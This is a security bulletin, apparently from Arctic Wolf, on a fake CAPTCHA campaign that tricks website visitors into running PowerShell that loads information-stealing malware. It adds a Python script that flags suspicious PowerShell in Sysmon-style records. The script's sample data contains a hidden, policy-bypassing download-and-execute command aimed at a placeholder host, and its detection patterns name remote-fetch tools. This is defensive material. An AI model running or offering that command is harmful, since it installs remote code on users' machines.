Arctic Wolf Security Bulletin

Widespread Fake CAPTCHA Campaign Delivering Malware


Arctic Wolf has recently observed a campaign in which threat actors are compromising widely used websites across various industries and embedding a fake CAPTCHA challenge. Victims who visit such a site are either presented with the fake CAPTCHA challenge directly or redirected to a site that provides instructions; following those instructions triggers PowerShell code execution, which ultimately loads information stealer malware.

Example of a fake CAPTCHA challenge 

Some recent examples of cases observed by Arctic Wolf, where websites were compromised and had an embedded fake CAPTCHA challenge, include: 

  • A popular physical therapy video site, HEP2go. 
  • Several auto dealership websites. 

At this time, Arctic Wolf is unaware of when the compromised websites will be fixed and strongly recommends avoiding websites that present a fake CAPTCHA challenge until the issue is resolved. Legitimate CAPTCHA challenges do not require users to copy a command or output and paste it into the Windows Run dialog box. If the challenge resembles the example above, the website is likely compromised and should not be visited. 

Arctic Wolf currently has detections in place that identify malicious PowerShell substrings observed in this campaign, and we will continue to notify customers when we identify new instances of this activity through current agent and Sysmon detections.
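The detection paragraph above describes process-level visibility through Sysmon. As an added illustration (not Arctic Wolf's own detection logic or substrings), the following Python triage runs generic heuristics over constructed Sysmon Event ID 1 style records: it flags PowerShell launched under explorer.exe, which is the parent a command pasted into the Run dialog gets, when the command line also carries two or more download-and-execute indicators. The sample records, placeholder URL and paths are constructed for this example.

```python
import re

# Constructed sample records shaped like Sysmon Event ID 1 (process creation) fields.
# The URL and script paths are placeholders invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm http://placeholder.invalid/v)"'},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"pwsh -NoProfile -File C:\Scripts\cleanup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NonInteractive -ExecutionPolicy Bypass -File C:\Tasks\backup.ps1"},
]

# Generic command-line heuristics chosen for this example; they are not the
# campaign-specific substrings that Arctic Wolf's detections look for.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass\b", re.I),
    "remote_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|mshta)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(event):
    """Return (suspicious, reasons) for one process-creation record."""
    if basename(event["Image"]) not in POWERSHELL:
        return False, []
    # A command pasted into the Run dialog (Win+R) is started by explorer.exe,
    # so that parent is the launch context this campaign relies on.
    from_explorer = basename(event["ParentImage"]) == "explorer.exe"
    reasons = ["parent is explorer.exe (Run dialog launch context)"] if from_explorer else []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # Alert only on the interactive launch context plus two or more indicator
    # categories, so a bare "powershell" typed into Win+R does not page anyone.
    return from_explorer and len(hits) >= 2, reasons + hits

def triage(events):
    """Return the command line and reasons for every suspicious record."""
    return [(e["CommandLine"], r) for e in events for s, r in [assess(e)] if s]

if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_EVENTS):
        print("SUSPICIOUS:", cmd, "|", ", ".join(why))
```

Only the first record is flagged; the scheduled-task record scores one indicator but lacks the explorer.exe parent, and the interactive script run has the parent but no indicators.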

Recommendations 

Avoid Websites That Present Fake CAPTCHA Challenges Indefinitely

At this time, Arctic Wolf strongly recommends avoiding websites that present a fake CAPTCHA challenge, as shown in the example above. This indicates the site is compromised and unsafe to visit. Arctic Wolf cannot currently comment on when or if these compromised websites will become safe to visit again. 

Install Arctic Wolf Agent & Sysmon

  • Arctic Wolf has implemented MDR detections for post-compromise threat activity associated with this campaign on endpoint devices. 
  • Arctic Wolf Agent and Sysmon give Arctic Wolf visibility into network and endpoint events needed to identify tools, techniques, and tactics involved in this campaign. 
  • For instructions on how to install Arctic Wolf Agent, see the install guides below: 
  • If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf. 

Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production. 

Implement Comprehensive Security Awareness Training

Arctic Wolf strongly recommends implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activities. 

Resources

Understand the threat landscape, and how to better defend your organization, with the 2025 Arctic Wolf Threat Report

See how Arctic Wolf utilizes threat intelligence to harden your attack surface and stop threats earlier and faster
